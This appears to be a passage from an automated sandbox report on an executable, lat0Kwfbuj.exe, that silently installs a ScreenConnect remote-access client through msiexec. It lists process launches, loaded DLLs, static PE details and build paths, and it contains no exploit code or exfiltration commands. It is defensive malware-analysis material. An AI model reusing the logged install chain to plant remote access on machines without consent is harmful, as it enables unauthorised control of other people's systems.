                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "61fcd7ba-9a06-4116-a3ec-642fd4d2ceac" "System"
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AEF3BD45AE3AC68FA3C1F0BB226B94AD CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1AEB7D6AE800B379962CD8E66BA70200Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 297D060039D81CAE5710DC99E60A4A0C E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "b15bf990-c25d-4951-af9a-ebda90b58672" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "61fcd7ba-9a06-4116-a3ec-642fd4d2ceac" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: lat0Kwfbuj.exeStatic PE information: certificate valid
                              Source: lat0Kwfbuj.exeStatic file information: File size 5639944 > 1048576
                              Source: lat0Kwfbuj.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x537600
                              Source: lat0Kwfbuj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: lat0Kwfbuj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: lat0Kwfbuj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: lat0Kwfbuj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: lat0Kwfbuj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: lat0Kwfbuj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: lat0Kwfbuj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: lat0Kwfbuj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: lat0Kwfbuj.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: lat0Kwfbuj.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
